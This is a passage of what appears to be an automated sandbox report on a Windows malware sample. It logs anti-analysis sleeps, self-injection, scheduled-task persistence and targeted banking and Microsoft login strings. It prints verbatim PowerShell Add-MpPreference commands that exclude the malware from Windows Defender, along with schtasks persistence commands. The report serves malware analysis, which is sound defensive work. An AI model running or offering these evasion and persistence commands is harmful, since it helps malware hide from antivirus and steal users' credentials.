                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWindow / User API: threadDelayed 8139
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe TID: 2656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep count: 353 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep count: 5852 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6948Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe TID: 1776Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe TID: 892Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe TID: 1276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe TID: 2824Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe TID: 3852Thread sleep time: -25825441703193356s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe TID: 5520Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe TID: 2468Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeThread delayed: delay time: 922337203685477
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: tmpA4D3.tmp.16.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: tmpA4D3.tmp.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: WltfeVzR.exe, 00000010.00000002.2314654586.000000000107F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrrps
                    Source: tmpA4D3.tmp.16.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmpA4D3.tmp.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: tmpA4D3.tmp.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: tmpA4D3.tmp.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmpA4D3.tmp.16.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmpA4D3.tmp.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2206038286.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmpA4D3.tmp.16.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: tmpA4D3.tmp.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmpA4D3.tmp.16.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: tmpA4D3.tmp.16.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmpA4D3.tmp.16.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: tmpA4D3.tmp.16.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmpA4D3.tmp.16.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: tmpA4D3.tmp.16.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: tmpA4D3.tmp.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: tmpA4D3.tmp.16.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: tmpA4D3.tmp.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: tmpA4D3.tmp.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory written: C:\Users\user\Desktop\tfF3UBTdr8.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory written: C:\Users\user\AppData\Roaming\WltfeVzR.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Users\user\Desktop\tfF3UBTdr8.exe "C:\Users\user\Desktop\tfF3UBTdr8.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmpAD91.tmp"
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeProcess created: C:\Users\user\AppData\Roaming\WltfeVzR.exe "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Users\user\Desktop\tfF3UBTdr8.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Users\user\Desktop\tfF3UBTdr8.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
